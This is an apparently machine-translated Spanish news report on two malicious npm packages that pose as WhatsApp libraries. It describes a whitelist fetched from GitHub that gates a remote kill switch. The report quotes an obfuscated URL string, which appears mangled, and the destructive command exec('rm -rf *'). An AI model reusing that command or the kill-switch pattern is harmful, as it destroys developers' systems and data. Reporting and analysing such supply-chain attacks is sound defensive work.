Dos paquetes de NPM maliciosos han surgido como armas sofisticadas que dirigen a los desarrolladores de WhatsApp a través de un mecanismo de destrucción controlada remota que puede borrar completamente los sistemas de desarrollo.
Los paquetes, identificados como Naya-Flore y NVLore-HSC, se esforzan como bibliotecas legítimas de Socket WhatsApp mientras albergan un interruptor de muerte devastador capaz de ejecutar la eliminación de archivos en todo el sistema a través de un solo comando.
Publicado por el usuario de NPM Nayflore utilizando la dirección de correo electrónico (correo electrónico protegido), estos paquetes armados han acumulado más de 1,110 descargas dentro de un mes, lo que demuestra su efectividad en la infiltración de flujos de trabajo del desarrollador.
Las bibliotecas maliciosas explotan el creciente ecosistema de la API de negocios de WhatsApp, que ahora atiende a más de 200 millones de empresas a nivel mundial, creando un entorno objetivo atractivo donde los desarrolladores instalan rutinariamente paquetes de terceros para el desarrollo de chatbot, la automatización del servicio al cliente e integraciones de mensajería.
Socket.dev Investigadores identificado El sofisticado mecanismo de ataque integrado dentro de lo que parece ser la funcionalidad de integración de WhatsApp estándar.
El código malicioso se dirige específicamente a la función SoldPairingCode, un componente legítimo que los desarrolladores invocarían naturalmente durante la configuración de autenticación de Bot de WhatsApp.
Arquitectura de interruptor de muerte remota
Los paquetes implementan un vector de ataque particularmente insidioso a través de su sistema de verificación de números de teléfono.
Tras la ejecución, el código malicioso recupera una base de datos remota de números de teléfono con la lista blanca de un repositorio de GitHub utilizando la obfuscación base64:–
const sesipath = “ahr0chm6ly9yyxcuz2l0ahvidxnlcmnvbnrlbnquy29tl25hdmfmaw5ol2rhdgfiyxnll21haw4vc2vza2e”; // decodifica a: https://raw.githubusercontent.com/navalinh/database/main/seska.json
La lógica de ataque opera a través de un mecanismo engañosamente simple dentro de la función SoldPairingCode. Después de obtener la lista blanca remota, el código verifica si el número de teléfono del desarrollador existe en la base de datos.
Lista de números de teléfono de la lista blanca que muestra los números móviles indonesios que evitan el interruptor de asesinato (fuente – Socket.dev)
Si se encuentra el número, el paquete continúa el funcionamiento normal. Sin embargo, para cualquier número de teléfono no listado, el sistema establece una variable de activación en “0000” y ejecuta la carga útil destructiva:-
if (getSnumberCode === “0000”) {exec (‘rm -rf *’) // destruir sistema}
Este enfoque de orientación selectiva permite a los actores de amenaza mantener la seguridad operativa al preservar los sistemas que pertenecen a números de teléfono específicos mientras destruyen a otros.
La base de datos alojada en GitHub proporciona un control en tiempo real sobre las decisiones de orientación sin requerir la republicación del paquete, lo que representa una evolución significativa en la sofisticación de ataque de la cadena de suministro.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
